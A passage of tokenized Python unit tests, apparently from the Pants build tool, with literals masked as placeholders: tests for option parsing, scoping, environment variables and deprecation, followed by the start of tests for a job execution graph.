) <EOL> self . assertEqual ( <NUM_LIT> , options . for_global_scope ( ) . num ) <EOL> self . assertEqual ( <NUM_LIT> , options . for_scope ( '<STR_LIT>' ) . num ) <EOL> self . assertEqual ( <NUM_LIT> , options . for_scope ( '<STR_LIT>' ) . num ) <EOL> def test_choices ( self ) : <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT:foo>' , options . for_global_scope ( ) . str_choices ) <EOL> options = self . 
_parse ( '<STR_LIT>' , config = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:bar>' } } ) <EOL> self . assertEqual ( '<STR_LIT:bar>' , options . for_global_scope ( ) . str_choices ) <EOL> with self . assertRaises ( ParseError ) : <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> options . for_global_scope ( ) <EOL> with self . assertRaises ( ParseError ) : <EOL> options = self . _parse ( '<STR_LIT>' , config = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } ) <EOL> options . for_global_scope ( ) <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertEqual ( [ <NUM_LIT> , <NUM_LIT> ] , options . for_global_scope ( ) . int_choices ) <EOL> def test_validation ( self ) : <EOL> def assertError ( expected_error , * args , ** kwargs ) : <EOL> with self . assertRaises ( expected_error ) : <EOL> options = Options . create ( args = [ ] , env = { } , config = self . _create_config ( { } ) , <EOL> known_scope_infos = [ ] , option_tracker = OptionTracker ( ) ) <EOL> options . register ( GLOBAL_SCOPE , * args , ** kwargs ) <EOL> options . for_global_scope ( ) <EOL> assertError ( NoOptionNames ) <EOL> assertError ( OptionNameDash , '<STR_LIT>' ) <EOL> assertError ( OptionNameDoubleDash , '<STR_LIT>' ) <EOL> assertError ( InvalidKwarg , '<STR_LIT>' , badkwarg = <NUM_LIT> ) <EOL> assertError ( ImplicitValIsNone , '<STR_LIT>' , implicit_value = None ) <EOL> assertError ( BooleanOptionNameWithNo , '<STR_LIT>' , type = bool ) <EOL> assertError ( MemberTypeNotAllowed , '<STR_LIT>' , member_type = int ) <EOL> assertError ( MemberTypeNotAllowed , '<STR_LIT>' , type = dict , member_type = int ) <EOL> assertError ( InvalidMemberType , '<STR_LIT>' , type = list , member_type = set ) <EOL> assertError ( InvalidMemberType , '<STR_LIT>' , type = list , member_type = list ) <EOL> assertError ( InvalidMemberType , '<STR_LIT>' , type = list , member_type = list ) <EOL> def test_frozen_registration ( self ) : <EOL> options = Options . create ( args = [ ] , env = { } , config = self . 
_create_config ( { } ) , <EOL> known_scope_infos = [ task ( '<STR_LIT:foo>' ) ] , option_tracker = OptionTracker ( ) ) <EOL> options . register ( '<STR_LIT:foo>' , '<STR_LIT>' ) <EOL> with self . assertRaises ( FrozenRegistration ) : <EOL> options . register ( GLOBAL_SCOPE , '<STR_LIT>' ) <EOL> def test_implicit_value ( self ) : <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT:default>' , options . for_global_scope ( ) . implicit_valuey ) <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT>' , options . for_global_scope ( ) . implicit_valuey ) <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT>' , options . for_global_scope ( ) . implicit_valuey ) <EOL> def test_shadowing ( self ) : <EOL> options = Options . create ( env = { } , <EOL> config = self . _create_config ( { } ) , <EOL> known_scope_infos = [ task ( '<STR_LIT:bar>' ) , intermediate ( '<STR_LIT:foo>' ) , task ( '<STR_LIT>' ) ] , <EOL> args = '<STR_LIT>' , <EOL> option_tracker = OptionTracker ( ) ) <EOL> options . register ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> options . register ( '<STR_LIT:foo>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> with self . assertRaises ( Shadowing ) : <EOL> options . register ( '<STR_LIT:bar>' , '<STR_LIT>' ) <EOL> with self . assertRaises ( Shadowing ) : <EOL> options . register ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> with self . assertRaises ( Shadowing ) : <EOL> options . register ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> with self . assertRaises ( Shadowing ) : <EOL> options . register ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> with self . assertRaises ( Shadowing ) : <EOL> options . register ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def test_recursion ( self ) : <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertEqual ( <NUM_LIT:5> , options . for_global_scope ( ) . num ) <EOL> self . assertEqual ( <NUM_LIT:6> , options . for_scope ( '<STR_LIT>' ) . 
num ) <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT:foo>' , options . for_global_scope ( ) . bar_baz ) <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> with self . assertRaises ( ParseError ) : <EOL> options . for_scope ( '<STR_LIT>' ) <EOL> def test_no_recursive_subsystem_options ( self ) : <EOL> options = Options . create ( env = { } , <EOL> config = self . _create_config ( { } ) , <EOL> known_scope_infos = [ subsystem ( '<STR_LIT:foo>' ) ] , <EOL> args = '<STR_LIT>' , <EOL> option_tracker = OptionTracker ( ) ) <EOL> with self . assertRaises ( RecursiveSubsystemOption ) : <EOL> options . register ( '<STR_LIT:foo>' , '<STR_LIT>' , recursive = False ) <EOL> options . for_scope ( '<STR_LIT:foo>' ) <EOL> with self . assertRaises ( RecursiveSubsystemOption ) : <EOL> options . register ( '<STR_LIT:foo>' , '<STR_LIT>' , recursive = True ) <EOL> options . for_scope ( '<STR_LIT:foo>' ) <EOL> def test_is_known_scope ( self ) : <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> for scope_info in self . _known_scope_infos : <EOL> self . assertTrue ( options . is_known_scope ( scope_info . scope ) ) <EOL> self . assertFalse ( options . is_known_scope ( '<STR_LIT>' ) ) <EOL> def test_designdoc_example ( self ) : <EOL> config = { <EOL> '<STR_LIT>' : { '<STR_LIT:b>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:a>' : '<STR_LIT>' , '<STR_LIT:c>' : '<STR_LIT>' } , <EOL> } <EOL> env = { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> options = self . _parse ( '<STR_LIT>' , <EOL> env = env , config = config ) <EOL> self . assertEqual ( <NUM_LIT:1> , options . for_global_scope ( ) . a ) <EOL> self . assertEqual ( <NUM_LIT> , options . for_global_scope ( ) . b ) <EOL> with self . assertRaises ( AttributeError ) : <EOL> options . for_global_scope ( ) . c <EOL> self . assertEqual ( <NUM_LIT:1> , options . for_scope ( '<STR_LIT>' ) . a ) <EOL> self . assertEqual ( <NUM_LIT:2> , options . for_scope ( '<STR_LIT>' ) . b ) <EOL> self . 
assertEqual ( <NUM_LIT> , options . for_scope ( '<STR_LIT>' ) . c ) <EOL> self . assertEqual ( <NUM_LIT:3> , options . for_scope ( '<STR_LIT>' ) . a ) <EOL> self . assertEqual ( <NUM_LIT:2> , options . for_scope ( '<STR_LIT>' ) . b ) <EOL> self . assertEqual ( <NUM_LIT:4> , options . for_scope ( '<STR_LIT>' ) . c ) <EOL> def test_file_spec_args ( self ) : <EOL> with tempfile . NamedTemporaryFile ( ) as tmp : <EOL> tmp . write ( dedent ( <EOL> """<STR_LIT>""" <EOL> ) ) <EOL> tmp . flush ( ) <EOL> cmdline = '<STR_LIT>' '<STR_LIT>' . format ( <EOL> filename = tmp . name ) <EOL> bootstrapper = OptionsBootstrapper ( args = shlex . split ( cmdline ) ) <EOL> bootstrap_options = bootstrapper . get_bootstrap_options ( ) . for_global_scope ( ) <EOL> options = self . _parse ( cmdline , bootstrap_option_values = bootstrap_options ) <EOL> sorted_specs = sorted ( options . target_specs ) <EOL> self . assertEqual ( [ '<STR_LIT:bar>' , '<STR_LIT>' , '<STR_LIT:foo>' , '<STR_LIT>' ] , sorted_specs ) <EOL> def test_passthru_args ( self ) : <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertEqual ( [ '<STR_LIT:bar>' , '<STR_LIT>' ] , options . passthru_args_for_scope ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( [ '<STR_LIT:bar>' , '<STR_LIT>' ] , options . passthru_args_for_scope ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( [ '<STR_LIT:bar>' , '<STR_LIT>' ] , options . passthru_args_for_scope ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( [ ] , options . passthru_args_for_scope ( '<STR_LIT:test>' ) ) <EOL> self . assertEqual ( [ ] , options . passthru_args_for_scope ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( [ ] , options . passthru_args_for_scope ( None ) ) <EOL> def test_global_scope_env_vars ( self ) : <EOL> def check_pants_foo ( expected_val , env ) : <EOL> val = self . _parse ( '<STR_LIT>' , env = env ) . for_global_scope ( ) . pants_foo <EOL> self . 
assertEqual ( expected_val , val ) <EOL> check_pants_foo ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) <EOL> check_pants_foo ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) <EOL> check_pants_foo ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) <EOL> check_pants_foo ( None , { <EOL> } ) <EOL> check_pants_foo ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) <EOL> def check_bar_baz ( expected_val , env ) : <EOL> val = self . _parse ( '<STR_LIT>' , env = env ) . for_global_scope ( ) . bar_baz <EOL> self . assertEqual ( expected_val , val ) <EOL> check_bar_baz ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) <EOL> check_bar_baz ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) <EOL> check_bar_baz ( None , { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } ) <EOL> check_bar_baz ( None , { <EOL> } ) <EOL> def test_scoped_env_vars ( self ) : <EOL> def check_scoped_spam ( scope , expected_val , env ) : <EOL> val = self . _parse ( '<STR_LIT>' , env = env ) . for_scope ( scope ) . spam <EOL> self . assertEqual ( expected_val , val ) <EOL> check_scoped_spam ( '<STR_LIT>' , '<STR_LIT:value>' , { '<STR_LIT>' : '<STR_LIT:value>' } ) <EOL> check_scoped_spam ( '<STR_LIT>' , '<STR_LIT:value>' , { '<STR_LIT>' : '<STR_LIT:value>' } ) <EOL> check_scoped_spam ( '<STR_LIT>' , '<STR_LIT:value>' , { '<STR_LIT>' : '<STR_LIT:value>' } ) <EOL> check_scoped_spam ( '<STR_LIT>' , '<STR_LIT:value>' , { '<STR_LIT>' : '<STR_LIT:value>' } ) <EOL> def test_drop_flag_values ( self ) : <EOL> options = self . _parse ( '<STR_LIT>' , <EOL> env = { '<STR_LIT>' : '<STR_LIT>' } , <EOL> config = { '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT> } } ) <EOL> defaulted_only_options = options . 
drop_flag_values ( ) <EOL> self . assertEqual ( '<STR_LIT>' , options . for_global_scope ( ) . bar_baz ) <EOL> self . assertIsNone ( defaulted_only_options . for_global_scope ( ) . bar_baz ) <EOL> self . assertEqual ( <NUM_LIT> , options . for_global_scope ( ) . num ) <EOL> self . assertEqual ( <NUM_LIT> , defaulted_only_options . for_global_scope ( ) . num ) <EOL> self . assertEqual ( <NUM_LIT:1> , options . for_scope ( '<STR_LIT>' ) . num ) <EOL> self . assertEqual ( <NUM_LIT> , defaulted_only_options . for_scope ( '<STR_LIT>' ) . num ) <EOL> self . assertEqual ( '<STR_LIT>' , options . for_global_scope ( ) . pants_foo ) <EOL> self . assertEqual ( '<STR_LIT>' , defaulted_only_options . for_global_scope ( ) . pants_foo ) <EOL> def test_deprecated_option_past_removal ( self ) : <EOL> """<STR_LIT>""" <EOL> with self . assertRaises ( CodeRemovedError ) : <EOL> self . _parse ( '<STR_LIT>' ) . for_global_scope ( ) <EOL> @ contextmanager <EOL> def warnings_catcher ( self ) : <EOL> with warnings . catch_warnings ( record = True ) as w : <EOL> warnings . simplefilter ( '<STR_LIT>' ) <EOL> yield w <EOL> def test_deprecated_options ( self ) : <EOL> def assertWarning ( w , option_string ) : <EOL> self . assertEquals ( <NUM_LIT:1> , len ( w ) ) <EOL> self . assertTrue ( issubclass ( w [ - <NUM_LIT:1> ] . category , DeprecationWarning ) ) <EOL> warning_message = str ( w [ - <NUM_LIT:1> ] . message ) <EOL> self . assertIn ( "<STR_LIT>" , <EOL> warning_message ) <EOL> self . assertIn ( option_string , warning_message ) <EOL> with self . warnings_catcher ( ) as w : <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertEquals ( '<STR_LIT>' , options . for_global_scope ( ) . global_crufty ) <EOL> assertWarning ( w , '<STR_LIT>' ) <EOL> with self . warnings_catcher ( ) as w : <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertTrue ( options . for_global_scope ( ) . global_crufty_boolean ) <EOL> assertWarning ( w , '<STR_LIT>' ) <EOL> with self . 
warnings_catcher ( ) as w : <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertFalse ( options . for_global_scope ( ) . global_crufty_boolean ) <EOL> assertWarning ( w , '<STR_LIT>' ) <EOL> with self . warnings_catcher ( ) as w : <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertEquals ( '<STR_LIT>' , options . for_scope ( '<STR_LIT>' ) . crufty ) <EOL> assertWarning ( w , '<STR_LIT>' ) <EOL> with self . warnings_catcher ( ) as w : <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertTrue ( options . for_scope ( '<STR_LIT>' ) . crufty_boolean ) <EOL> assertWarning ( w , '<STR_LIT>' ) <EOL> with self . warnings_catcher ( ) as w : <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertFalse ( options . for_scope ( '<STR_LIT>' ) . crufty_boolean ) <EOL> assertWarning ( w , '<STR_LIT>' ) <EOL> with self . warnings_catcher ( ) as w : <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertFalse ( options . for_scope ( '<STR_LIT>' ) . crufty_boolean ) <EOL> assertWarning ( w , '<STR_LIT>' ) <EOL> with self . warnings_catcher ( ) as w : <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertTrue ( options . for_scope ( '<STR_LIT>' ) . crufty_boolean ) <EOL> assertWarning ( w , '<STR_LIT>' ) <EOL> with self . warnings_catcher ( ) as w : <EOL> self . _parse ( '<STR_LIT>' ) <EOL> self . assertEquals ( <NUM_LIT:0> , len ( w ) ) <EOL> def test_middle_scoped_options ( self ) : <EOL> """<STR_LIT>""" <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> self . assertEquals ( <NUM_LIT:100> , options . for_global_scope ( ) . a ) <EOL> self . assertEquals ( <NUM_LIT> , options . for_scope ( '<STR_LIT>' ) . a ) <EOL> self . assertEquals ( <NUM_LIT> , options . for_scope ( '<STR_LIT>' ) . a ) <EOL> options = self . _parse ( '<STR_LIT>' , <EOL> config = { <EOL> '<STR_LIT>' : { '<STR_LIT:a>' : <NUM_LIT:100> } , <EOL> '<STR_LIT>' : { '<STR_LIT:a>' : <NUM_LIT> } , <EOL> } ) <EOL> self . 
assertEquals ( <NUM_LIT:100> , options . for_global_scope ( ) . a ) <EOL> self . assertEquals ( <NUM_LIT> , options . for_scope ( '<STR_LIT>' ) . a ) <EOL> self . assertEquals ( <NUM_LIT:100> , options . for_scope ( '<STR_LIT>' ) . a ) <EOL> options = self . _parse ( '<STR_LIT>' , <EOL> env = { <EOL> '<STR_LIT>' : <NUM_LIT:100> , <EOL> '<STR_LIT>' : <NUM_LIT> } ) <EOL> self . assertEquals ( <NUM_LIT:100> , options . for_global_scope ( ) . a ) <EOL> self . assertEquals ( <NUM_LIT> , options . for_scope ( '<STR_LIT>' ) . a ) <EOL> self . assertEquals ( <NUM_LIT> , options . for_scope ( '<STR_LIT>' ) . a ) <EOL> options = self . _parse ( '<STR_LIT>' , <EOL> config = { <EOL> '<STR_LIT>' : { '<STR_LIT:a>' : <NUM_LIT:100> } , <EOL> } ) <EOL> self . assertEquals ( <NUM_LIT:100> , options . for_global_scope ( ) . a ) <EOL> self . assertEquals ( <NUM_LIT> , options . for_scope ( '<STR_LIT>' ) . a ) <EOL> self . assertEquals ( <NUM_LIT> , options . for_scope ( '<STR_LIT>' ) . a ) <EOL> options = self . _parse ( '<STR_LIT>' , <EOL> env = { '<STR_LIT>' : <NUM_LIT:100> } , ) <EOL> self . assertEquals ( <NUM_LIT:100> , options . for_global_scope ( ) . a ) <EOL> self . assertEquals ( <NUM_LIT> , options . for_scope ( '<STR_LIT>' ) . a ) <EOL> self . assertEquals ( <NUM_LIT> , options . for_scope ( '<STR_LIT>' ) . a ) <EOL> options = self . _parse ( '<STR_LIT>' , <EOL> config = { <EOL> '<STR_LIT>' : { '<STR_LIT:a>' : <NUM_LIT:100> } , <EOL> } , <EOL> env = { '<STR_LIT>' : <NUM_LIT> } , ) <EOL> self . assertEquals ( <NUM_LIT:100> , options . for_global_scope ( ) . a ) <EOL> self . assertEquals ( <NUM_LIT> , options . for_scope ( '<STR_LIT>' ) . a ) <EOL> self . assertEquals ( <NUM_LIT> , options . for_scope ( '<STR_LIT>' ) . a ) <EOL> options = self . _parse ( '<STR_LIT>' , <EOL> env = { '<STR_LIT>' : <NUM_LIT> } , ) <EOL> self . assertEquals ( <NUM_LIT:100> , options . for_global_scope ( ) . a ) <EOL> self . assertEquals ( <NUM_LIT:100> , options . for_scope ( '<STR_LIT>' ) . 
a ) <EOL> self . assertEquals ( <NUM_LIT:100> , options . for_scope ( '<STR_LIT>' ) . a ) <EOL> options = self . _parse ( '<STR_LIT>' , <EOL> config = { <EOL> '<STR_LIT>' : { '<STR_LIT:a>' : <NUM_LIT> } , <EOL> } ) <EOL> self . assertEquals ( <NUM_LIT:100> , options . for_global_scope ( ) . a ) <EOL> self . assertEquals ( <NUM_LIT:100> , options . for_scope ( '<STR_LIT>' ) . a ) <EOL> self . assertEquals ( <NUM_LIT:100> , options . for_scope ( '<STR_LIT>' ) . a ) <EOL> options = self . _parse ( '<STR_LIT>' , <EOL> config = { <EOL> '<STR_LIT>' : { '<STR_LIT:a>' : <NUM_LIT> } , <EOL> } , <EOL> env = { '<STR_LIT>' : <NUM_LIT:100> } , ) <EOL> self . assertEquals ( <NUM_LIT:100> , options . for_global_scope ( ) . a ) <EOL> self . assertEquals ( <NUM_LIT:100> , options . for_scope ( '<STR_LIT>' ) . a ) <EOL> self . assertEquals ( <NUM_LIT:100> , options . for_scope ( '<STR_LIT>' ) . a ) <EOL> def test_complete_scopes ( self ) : <EOL> _global = GlobalOptionsRegistrar . get_scope_info ( ) <EOL> self . assertEquals ( { _global , intermediate ( '<STR_LIT:foo>' ) , intermediate ( '<STR_LIT>' ) , task ( '<STR_LIT>' ) } , <EOL> Options . complete_scopes ( { task ( '<STR_LIT>' ) } ) ) <EOL> self . assertEquals ( { _global , intermediate ( '<STR_LIT:foo>' ) , intermediate ( '<STR_LIT>' ) , task ( '<STR_LIT>' ) } , <EOL> Options . complete_scopes ( { GlobalOptionsRegistrar . get_scope_info ( ) , <EOL> task ( '<STR_LIT>' ) } ) ) <EOL> self . assertEquals ( { _global , intermediate ( '<STR_LIT:foo>' ) , intermediate ( '<STR_LIT>' ) , task ( '<STR_LIT>' ) } , <EOL> Options . complete_scopes ( { intermediate ( '<STR_LIT:foo>' ) , task ( '<STR_LIT>' ) } ) ) <EOL> self . assertEquals ( { _global , intermediate ( '<STR_LIT:foo>' ) , intermediate ( '<STR_LIT>' ) , task ( '<STR_LIT>' ) , <EOL> intermediate ( '<STR_LIT>' ) , task ( '<STR_LIT>' ) } , <EOL> Options . 
complete_scopes ( { task ( '<STR_LIT>' ) , task ( '<STR_LIT>' ) } ) ) <EOL> def test_get_fingerprintable_for_scope ( self ) : <EOL> options = self . _parse ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> pairs = options . get_fingerprintable_for_scope ( '<STR_LIT>' ) <EOL> self . assertEquals ( len ( pairs ) , <NUM_LIT:3> ) <EOL> self . assertEquals ( ( str , '<STR_LIT>' ) , pairs [ <NUM_LIT:0> ] ) <EOL> self . assertEquals ( ( bool , True ) , pairs [ <NUM_LIT:1> ] ) <EOL> self . assertEquals ( ( int , <NUM_LIT> ) , pairs [ <NUM_LIT:2> ] ) <EOL> def assert_fromfile ( self , parse_func , expected_append = None , append_contents = None ) : <EOL> def _do_assert_fromfile ( dest , expected , contents ) : <EOL> with temporary_file ( ) as fp : <EOL> fp . write ( contents ) <EOL> fp . close ( ) <EOL> options = parse_func ( dest , fp . name ) <EOL> self . assertEqual ( expected , options . for_scope ( '<STR_LIT>' ) [ dest ] ) <EOL> _do_assert_fromfile ( dest = '<STR_LIT:string>' , expected = '<STR_LIT>' , contents = '<STR_LIT>' ) <EOL> _do_assert_fromfile ( dest = '<STR_LIT>' , expected = <NUM_LIT> , contents = '<STR_LIT>' ) <EOL> _do_assert_fromfile ( dest = '<STR_LIT>' , expected = { '<STR_LIT:a>' : <NUM_LIT> , '<STR_LIT:b>' : ( <NUM_LIT:1> , <NUM_LIT:2> ) } , contents = dedent ( """<STR_LIT>""" ) ) <EOL> _do_assert_fromfile ( dest = '<STR_LIT>' , expected = [ '<STR_LIT:a>' , '<STR_LIT:1>' , '<STR_LIT:2>' ] , contents = dedent ( """<STR_LIT>""" ) ) <EOL> expected_append = expected_append or [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT> ] <EOL> append_contents = append_contents or dedent ( """<STR_LIT>""" ) <EOL> _do_assert_fromfile ( dest = '<STR_LIT>' , expected = expected_append , contents = append_contents ) <EOL> def test_fromfile_flags ( self ) : <EOL> def parse_func ( dest , fromfile ) : <EOL> return self . _parse ( '<STR_LIT>' . format ( dest . replace ( '<STR_LIT:_>' , '<STR_LIT:->' ) , fromfile ) ) <EOL> self . 
assert_fromfile ( parse_func , expected_append = [ <NUM_LIT> ] , append_contents = '<STR_LIT>' ) <EOL> def test_fromfile_config ( self ) : <EOL> def parse_func ( dest , fromfile ) : <EOL> return self . _parse ( '<STR_LIT>' , config = { '<STR_LIT>' : { dest : '<STR_LIT>' . format ( fromfile ) } } ) <EOL> self . assert_fromfile ( parse_func ) <EOL> def test_fromfile_env ( self ) : <EOL> def parse_func ( dest , fromfile ) : <EOL> return self . _parse ( '<STR_LIT>' , <EOL> env = { '<STR_LIT>' . format ( dest . upper ( ) ) : '<STR_LIT>' . format ( fromfile ) } ) <EOL> self . assert_fromfile ( parse_func ) <EOL> def test_fromfile_error ( self ) : <EOL> options = self . _parse ( '<STR_LIT>' ) <EOL> with self . assertRaises ( Parser . FromfileError ) : <EOL> options . for_scope ( '<STR_LIT>' ) <EOL> def test_fromfile_escape ( self ) : <EOL> options = self . _parse ( r'<STR_LIT>' ) <EOL> self . assertEqual ( '<STR_LIT>' , options . for_scope ( '<STR_LIT>' ) . string ) <EOL> def test_ranked_value_equality ( self ) : <EOL> none = RankedValue ( RankedValue . NONE , None ) <EOL> some = RankedValue ( RankedValue . HARDCODED , '<STR_LIT>' ) <EOL> self . assertEquals ( '<STR_LIT>' , str ( none ) ) <EOL> self . assertEquals ( '<STR_LIT>' , str ( some ) ) <EOL> self . assertNotEqual ( some , none ) <EOL> self . assertEqual ( some , RankedValue ( RankedValue . HARDCODED , '<STR_LIT>' ) ) <EOL> self . assertNotEqual ( some , RankedValue ( RankedValue . HARDCODED , '<STR_LIT>' ) ) <EOL> self . assertNotEqual ( some , RankedValue ( RankedValue . CONFIG , '<STR_LIT>' ) ) <EOL> def test_option_tracker_required ( self ) : <EOL> with self . assertRaises ( Options . OptionTrackerRequiredError ) : <EOL> Options . 
create ( None , None , [ ] ) <EOL> def test_pants_global_designdoc_example ( self ) : <EOL> config = { <EOL> '<STR_LIT>' : { '<STR_LIT:b>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT:a>' : '<STR_LIT>' , '<STR_LIT:c>' : '<STR_LIT>' } , <EOL> } <EOL> env = { <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> options = self . _parse ( '<STR_LIT>' , <EOL> env = env , config = config ) <EOL> self . assertEqual ( <NUM_LIT:1> , options . for_global_scope ( ) . a ) <EOL> self . assertEqual ( <NUM_LIT> , options . for_global_scope ( ) . b ) <EOL> with self . assertRaises ( AttributeError ) : <EOL> options . for_global_scope ( ) . c <EOL> self . assertEqual ( <NUM_LIT:1> , options . for_scope ( '<STR_LIT>' ) . a ) <EOL> self . assertEqual ( <NUM_LIT:2> , options . for_scope ( '<STR_LIT>' ) . b ) <EOL> self . assertEqual ( <NUM_LIT> , options . for_scope ( '<STR_LIT>' ) . c ) <EOL> self . assertEqual ( <NUM_LIT:3> , options . for_scope ( '<STR_LIT>' ) . a ) <EOL> self . assertEqual ( <NUM_LIT:2> , options . for_scope ( '<STR_LIT>' ) . b ) <EOL> self . assertEqual ( <NUM_LIT:4> , options . for_scope ( '<STR_LIT>' ) . c ) <EOL> def test_pants_global_with_default ( self ) : <EOL> """<STR_LIT>""" <EOL> config = { '<STR_LIT>' : { '<STR_LIT:b>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : True } <EOL> } <EOL> options = self . _parse ( '<STR_LIT>' , config = config ) <EOL> self . assertEqual ( <NUM_LIT> , options . for_global_scope ( ) . b ) <EOL> self . assertTrue ( options . for_global_scope ( ) . store_true_flag ) <EOL> def test_double_registration ( self ) : <EOL> options = Options . create ( env = { } , <EOL> config = self . _create_config ( { } ) , <EOL> known_scope_infos = OptionsTest . _known_scope_infos , <EOL> args = shlex . split ( '<STR_LIT>' ) , <EOL> option_tracker = OptionTracker ( ) ) <EOL> options . register ( GLOBAL_SCOPE , '<STR_LIT>' ) <EOL> self . assertRaises ( OptionAlreadyRegistered , lambda : options . register ( GLOBAL_SCOPE , '<STR_LIT>' ) ) </s>
<s> from __future__ import ( absolute_import , division , generators , nested_scopes , print_function , <EOL> unicode_literals , with_statement ) <EOL> import unittest <EOL> from pants . backend . jvm . tasks . jvm_compile . execution_graph import ( ExecutionFailure , ExecutionGraph , <EOL> Job , JobExistsError , <EOL> NoRootJobError , UnknownJobError ) <EOL> class ImmediatelyExecutingPool ( object ) : <EOL> num_workers = <NUM_LIT:1> <EOL> def submit_async_work ( self , work ) : <EOL> work . func ( * work . args_tuples [ <NUM_LIT:0> ] ) <EOL> class PrintLogger ( object ) : <EOL> def error ( self , msg ) : <EOL> print ( msg ) <EOL> def debug ( self , msg ) : <EOL> print ( msg ) <EOL> def passing_fn ( ) : <EOL> pass <EOL> def raising_fn ( ) : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> class ExecutionGraphTest ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . jobs_run = [ ] <EOL> def execute ( self , exec_graph ) : <EOL> exec_graph . execute ( ImmediatelyExecutingPool ( ) , PrintLogger ( ) ) <EOL> def job ( self , name , fn , dependencies , size = <NUM_LIT:0> , on_success = None , on_failure = None ) : <EOL> def recording_fn ( ) : <EOL> self . jobs_run . append ( name ) <EOL> fn ( ) <EOL> return Job ( name , recording_fn , dependencies , size , on_success , on_failure ) <EOL> def test_single_job ( self ) : <EOL> exec_graph = ExecutionGraph ( [ self . job ( "<STR_LIT:A>" , passing_fn , [ ] ) ] ) <EOL> self . execute ( exec_graph ) <EOL> self . assertEqual ( self . jobs_run , [ "<STR_LIT:A>" ] ) <EOL> def test_single_dependency ( self ) : <EOL> exec_graph = ExecutionGraph ( [ self . job ( "<STR_LIT:A>" , passing_fn , [ "<STR_LIT:B>" ] ) , <EOL> self . job ( "<STR_LIT:B>" , passing_fn , [ ] ) ] ) <EOL> self . execute ( exec_graph ) <EOL> self . assertEqual ( self . jobs_run , [ "<STR_LIT:B>" , "<STR_LIT:A>" ] ) <EOL> def test_simple_binary_tree ( self ) : <EOL> exec_graph = ExecutionGraph ( [ self . 
job ( "<STR_LIT:A>" , passing_fn , [ "<STR_LIT:B>" , "<STR_LIT:C>" ] ) , <EOL> self . job ( "<STR_LIT:B>" , passing_fn , [ ] ) , <EOL> self . job ( "<STR_LIT:C>" , passing_fn , [ ] ) ] ) <EOL> self . execute ( exec_graph ) <EOL> self . assertEqual ( self . jobs_run , [ "<STR_LIT:B>" , "<STR_LIT:C>" , "<STR_LIT:A>" ] ) <EOL> def test_simple_linear_dependencies ( self ) : <EOL> exec_graph = ExecutionGraph ( [ self . job ( "<STR_LIT:A>" , passing_fn , [ "<STR_LIT:B>" ] ) , <EOL> self . job ( "<STR_LIT:B>" , passing_fn , [ "<STR_LIT:C>" ] ) , <EOL> self . job ( "<STR_LIT:C>" , passing_fn , [ ] ) ] ) <EOL> self . execute ( exec_graph ) <EOL> self . assertEqual ( self . jobs_run , [ "<STR_LIT:C>" , "<STR_LIT:B>" , "<STR_LIT:A>" ] ) <EOL> def test_simple_unconnected ( self ) : <EOL> exec_graph = ExecutionGraph ( [ self . job ( "<STR_LIT:A>" , passing_fn , [ ] ) , <EOL> self . job ( "<STR_LIT:B>" , passing_fn , [ ] ) , <EOL> ] ) <EOL> 